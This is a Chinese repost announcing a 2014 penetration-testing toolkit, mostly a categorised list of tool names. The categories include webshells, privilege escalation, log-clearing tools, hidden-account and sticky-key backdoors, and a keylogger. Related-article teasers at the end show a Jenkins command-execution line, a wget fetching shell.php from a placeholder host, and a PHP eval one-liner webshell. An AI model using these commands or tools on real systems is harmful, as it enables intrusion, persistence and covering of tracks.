【转】渗透工具包2014贺岁版发布

摘要:
资料来源:http://www.52pojie.cn/forum.php?mod=viewthread&tid=232609主要内容(根据常规渗透测试流程定制)1.全面扫描2.目录检测3.注入检测4.侧注和c部分5.包捕获和包更改6.webshell 7.授权工具8.arp嗅探7.社会工程8.破解工具9.字典相关10.跟踪清理11.漏洞利用12.后门程序13。其他工具14.渗透学习工具详细信息:1.ap的全面检测
文章来源:http://www.52pojie.cn/forum.php?mod=viewthread&tid=232609
主体内容(根据常规渗透测试流程定制)
1.  综合扫描
2.  目录检测
3.  注入检测
4.  旁注与c段
5.  抓包改包
6.  webshell
7.  提权工具
8.  arp嗅探
7.  社会工程
8.  破解工具
9.  字典相关
10. 痕迹清理
11. 漏洞利用
12. 后门程序
13. 其他工具
14. 渗透学习
工具细节:
1.综合检测
appscan、burp、JSky、safe3wvs、苹果FTP批量扫描工具、WebCruiser、WebSploit Toolkit V.1.9
wvs、x站神器3.7、x站神器3.7、cv6、百度新闻源挖掘机
2.目录检测
chrome后台扫描插件、Pker多线程后台极速扫描工具、WebRobot、WebScan、Wordpress爆路径工具
wwwscan三个版本(单个、批量、扫备份)、清凉扫描
3.注入检测
COOKIE注入工具、Havij、HDSI3.0、NBSI、Oracle_反弹注入工具v1.0、SqlMap免Python环境绿色版
sqlmap中文包、穿山甲Pangolin、穿山甲Pangolin、河马MySQL注入工具、河马PostgreSQL注入工具
河马SQLServer注入工具、明小子、手工注入辅助工具、注入中转、GetWebShell增强版、啊d注入工具
mysql注入辅助程序、小葵多功能转换工具
4.旁站与c段
Happy工具箱、Layer、python二级域名批量采集脚本、python抓取谷歌链接工具、长安刺客旁注杀手
超级旁注、御剑1.5、御剑后台扫描珍藏版、御剑无字典大小限制1937版、3EST 旁注扫描器
T00ls内部旁注扫描器(需要.net环境)、二级域名爆破工具、鬼哥旁注C段利器
5.抓包该包
COOKIES browser、MatriXay1073、smsniff、WSockExpert、WSockExpert_Cn、Fiddler2原版
HttpAnalyzerFullTrial_V6、WSExplorer 1.3、网络抓包工具
6.webshell
ASP马、aspx马、aspx一句话及客户端、cfm马、cgi马、jsp马、php马、war马、两用一句话图片马
数据库解压、中国菜刀(最新过狗2013-12-20)、一句话大全
7.提权工具
hash读取、无net提权、巴西烤肉、lxc、linux、iis、exp大全、端口转发、3389大全、dll、udf
nc、lpk、星外、s-u、无组件提权
8.arp嗅探
Arp EMP v1.0、cain_v4.9汉化版、MAC地址扫描器、NetFuke、幻境网盾3.7、ARPKiller.exe、
嗅探马
9.社会工程
EMailSearch、MB社工辅助工具包、theHarvester-免py环境版、社工利器-手机信息查询、身份证查询
邮件伪造、MaltegoInstaller-v202-CE
10.破解工具
各种数据库破解、密文破解、webshell破解
11.字典相关
3389字典、idc机房字典、字典生成器
12.痕迹清理
cleaniis、CleanIISLog、clearlogs、IE记录清理、常用入侵清除器、清除IIS日志logcleaner1.0
日志清除器、无影无踪4.4、组策略清除工具1.1
13.漏洞利用
dedecms5.7、Fckeditor综合利用工具、struts2 漏洞利用工具、撸大师1.7、Discuz! X Getshell
IIS写权限利用工具、phpcms利用工具
14.后门程序
LPK2.0、shift后门、T00ls Lpk Sethc v4、T00ls_Lpk_Sethc_v3、不死帐号、截取3389、lpk sethc v4
全盘感染shift后门、添加超级隐藏账户、隐藏后门 除非重装、最新shift后门
15.其他工具
Converter-zh_CN、HconSTF_v0.4_portable、putty、SQL连接、数据库浏览器、Codeeer Explorer
OWASP Mantra - Armada Win、鬼哥多功能浏览器、1937专用记事本、键盘记录器

免责声明:文章转载自《【转】渗透工具包2014贺岁版发布》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇Weblogic12c 单节点安装idea 2018 配置lombok插件及使用lombok设置实体类的getter和setter下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

web shell

介绍: 为什么文件上传存在漏洞 上传文件时,如果服务器代码未对客户端上传的文件进行严格的验证和过滤,就容易造成 可以上传任意文件的情况,包括上传脚本文件(asp、aspx、php、jsp 等格式的文件)。 ·危害 非法用户可以利用上传的恶意脚本文件控制整个网站,甚至控制服务器。这个恶意的脚本 文件,又称之为 webshell,也可将 webshell 脚本...

jenkins未授权访问/弱口令漏洞

昨天晚上面试官问到了,还没来得及看,今天又问到了,猝不及防,蓝瘦,香菇、、、 今天特此总结一下,给自己一个交代。 总述:进入后台可进行如下操作: 直接执行系统命令: println "cmd".execute().text wget下载文件getshell: println "wget http://xxxx/tools/shell.php -P /t...

【web端权限维持】利用ADS隐藏webshell

0X01 前言   未知攻,焉知防,在web端如何做手脚维护自己拿到的权限呢?首先要面临的是webshell查杀,那么通过利用ADS隐藏webshell,不失为一个好办法。 0X02 利用ADS隐藏webshell   关于ADS的介绍,就不再阐述,详见尾部参考资料。   PHP 一句话木马:<?php @eval($_POST['chopper']...

墨者学院WebShell文件上传分析溯源(第2题)Write

今天看文章看到一道比较有意思的题,复现并记录一下,友情提示,这个靶场经常经常经常出问题,如果发现路径无法访问等问题,重启解决就好~ 寻找上传文件 访问提示后台,访问admin/upload.php会显示没有权限,并有一个upload1.php页面一闪而过,随后跳转到upload2.php,用burp抓包,得到上传页面 确定上传路径 上传之后只会显示上传路径...